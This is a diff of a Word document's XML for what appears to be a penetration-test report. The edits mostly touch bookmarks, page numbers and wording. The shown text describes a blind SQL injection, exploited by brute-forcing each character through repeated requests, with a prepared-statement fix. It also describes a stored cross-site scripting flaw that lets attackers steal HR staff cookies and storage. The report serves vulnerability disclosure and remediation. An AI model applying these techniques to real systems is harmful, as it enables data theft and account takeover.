               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3739,7 +3739,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71299243 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325136 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3759,7 +3759,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3784,7 +3784,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71299244" w:history="1">
+          <w:hyperlink w:anchor="_Toc71325137" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3812,7 +3812,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71299244 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325137 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3832,7 +3832,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3857,7 +3857,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71299245" w:history="1">
+          <w:hyperlink w:anchor="_Toc71325138" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3885,7 +3885,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71299245 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325138 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3905,7 +3905,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3930,7 +3930,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71299246" w:history="1">
+          <w:hyperlink w:anchor="_Toc71325139" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3958,7 +3958,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71299246 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325139 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3978,7 +3978,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4003,7 +4003,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71299247" w:history="1">
+          <w:hyperlink w:anchor="_Toc71325140" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4031,7 +4031,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71299247 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325140 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4051,7 +4051,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4076,7 +4076,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71299248" w:history="1">
+          <w:hyperlink w:anchor="_Toc71325141" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4103,7 +4103,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71299248 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325141 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4123,7 +4123,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4148,7 +4148,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71299249" w:history="1">
+          <w:hyperlink w:anchor="_Toc71325142" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4175,7 +4175,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71299249 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325142 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4195,7 +4195,80 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71325143" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Section 1 – SQL injection exploitation walkthrough</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325143 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4232,7 +4305,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc71299206"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71325099"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Summary of Findings</w:t>
@@ -4536,7 +4609,7 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Stored crossing-site scripting vulnerability present in anonymous question func</w:t>
+              <w:t>Stored cross-site scripting vulnerability present in anonymous question func</w:t>
             </w:r>
             <w:r>
               <w:t>t</w:t>
@@ -4860,7 +4933,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc71299207"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc71325100"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Detailed Findings</w:t>
@@ -4878,7 +4951,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc71299208"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc71325101"/>
       <w:r>
         <w:t xml:space="preserve">Finding 1 - </w:t>
       </w:r>
@@ -4933,7 +5006,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="4" w:name="_Toc71299209"/>
+            <w:bookmarkStart w:id="4" w:name="_Toc71325102"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5071,7 +5144,61 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>In this way, although the attacker will not be able to read out the data directly from one response, same information can be constructed by brute-forcing each character through repeated requests.</w:t>
+              <w:t>A</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>lthough attacker</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> will not be able to read out the data directly from </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>the</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> response, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>they</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> can construct</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> the same information</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> by brute-forcing each character through repeated requests.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5137,7 +5264,38 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>he exploitation requires the attacker to login first so if only staff have the access to the portal, the likelihood it happens will significantly decreases.</w:t>
+              <w:t xml:space="preserve">he exploitation requires the attacker to login first so if only </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>specific users</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> have the access to the portal, the likelihood </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>t</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">hat </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>it happens will significantly decreases.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5179,7 +5337,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="5" w:name="_Proof_of_Concept"/>
-            <w:bookmarkStart w:id="6" w:name="_Toc71299210"/>
+            <w:bookmarkStart w:id="6" w:name="_Toc71325103"/>
             <w:bookmarkEnd w:id="5"/>
             <w:r>
               <w:rPr>
@@ -5247,10 +5405,20 @@
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
-              <w:t>with</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> appending some</w:t>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>b</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">y </w:t>
+            </w:r>
+            <w:r>
+              <w:t>appending some</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> </w:t>
@@ -5268,7 +5436,13 @@
               <w:t xml:space="preserve">The API will return “true” when the query </w:t>
             </w:r>
             <w:r>
-              <w:t>fetches something back. By taking advantage of such, an attacker can construct anything they want from the database by brute-forcing each character</w:t>
+              <w:t xml:space="preserve">fetches something back. By taking advantage of </w:t>
+            </w:r>
+            <w:r>
+              <w:t>that</w:t>
+            </w:r>
+            <w:r>
+              <w:t>, an attacker can construct anything they want from the database by brute-forcing each character</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> one by one</w:t>
@@ -5323,7 +5497,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="7" w:name="_Toc71299211"/>
+            <w:bookmarkStart w:id="7" w:name="_Toc71325104"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5412,7 +5586,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="8" w:name="_Toc71299212"/>
+            <w:bookmarkStart w:id="8" w:name="_Toc71325105"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5508,7 +5682,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="9" w:name="_Toc71299213"/>
+            <w:bookmarkStart w:id="9" w:name="_Toc71325106"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5611,7 +5785,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="10" w:name="_Toc71299214"/>
+            <w:bookmarkStart w:id="10" w:name="_Toc71325107"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5698,7 +5872,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="11" w:name="_Toc71299215"/>
+            <w:bookmarkStart w:id="11" w:name="_Toc71325108"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5793,11 +5967,15 @@
               <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>$</w:t>
             </w:r>
@@ -5805,6 +5983,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>stmt</w:t>
             </w:r>
@@ -5812,6 +5992,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t xml:space="preserve"> = $con-&gt;</w:t>
             </w:r>
@@ -5819,6 +6001,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>prepare(</w:t>
             </w:r>
@@ -5826,6 +6010,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
@@ -5845,11 +6031,15 @@
               <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>$</w:t>
             </w:r>
@@ -5857,6 +6047,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>stmt</w:t>
             </w:r>
@@ -5864,6 +6056,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>-&gt;</w:t>
             </w:r>
@@ -5871,6 +6065,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>bind_</w:t>
             </w:r>
@@ -5878,6 +6074,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>param</w:t>
             </w:r>
@@ -5885,6 +6083,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>(</w:t>
             </w:r>
@@ -5892,6 +6092,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>"s", $_GET["username"]);</w:t>
             </w:r>
@@ -5911,11 +6113,15 @@
               <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>$</w:t>
             </w:r>
@@ -5923,6 +6129,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>stmt</w:t>
             </w:r>
@@ -5930,6 +6138,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>-&gt;</w:t>
             </w:r>
@@ -5937,6 +6147,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>execute(</w:t>
             </w:r>
@@ -5944,6 +6156,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>);</w:t>
             </w:r>
@@ -5963,11 +6177,15 @@
               <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>$</w:t>
             </w:r>
@@ -5975,6 +6193,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>stmt</w:t>
             </w:r>
@@ -5982,6 +6202,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>-&gt;</w:t>
             </w:r>
@@ -5989,6 +6211,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>close(</w:t>
             </w:r>
@@ -5996,6 +6220,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
               </w:rPr>
               <w:t>);</w:t>
             </w:r>
@@ -6068,13 +6294,13 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc71299216"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71325109"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 2 - </w:t>
       </w:r>
       <w:r>
-        <w:t>Stored crossing-site scripting vulnerability present in anonymous question functionality</w:t>
+        <w:t>Stored cross-site scripting vulnerability present in anonymous question functionality</w:t>
       </w:r>
       <w:bookmarkEnd w:id="12"/>
     </w:p>
@@ -6113,11 +6339,12 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="13" w:name="_Toc71299217"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="13" w:name="_Toc71325110"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6138,6 +6365,157 @@
               <w:right w:w="100" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Stored cross-site scripting</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> vulnerability presents in</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> the </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>anonymous question functionality</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Malicious us</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>er</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> can inject arbitrary code into the database </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>and when the code is triggered, unauthorised actions with elevated privileges could be performed on behalf the admin users.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">he exploitation requires the attacker to login first so if only </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>specific users</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> have the access to the portal, the likelihood</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> that</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> it happens will significantly decreases.</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:widowControl w:val="0"/>
@@ -6168,18 +6546,21 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="14" w:name="_Toc71299218"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="14" w:name="_Proof_of_Concept_1"/>
+            <w:bookmarkStart w:id="15" w:name="_Toc71325111"/>
+            <w:bookmarkEnd w:id="14"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Proof of Concept</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="14"/>
+            <w:bookmarkEnd w:id="15"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6204,10 +6585,154 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
-            </w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>his vulnerability can be exploited by submitting malicious code entered as anonymous question.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Attackers are able to steal DOM, cookies and local storage of whoever triggered the code. In this case, attackers are able to perform unauthorised actions on behalf of </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>any</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> HR team member who happens</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
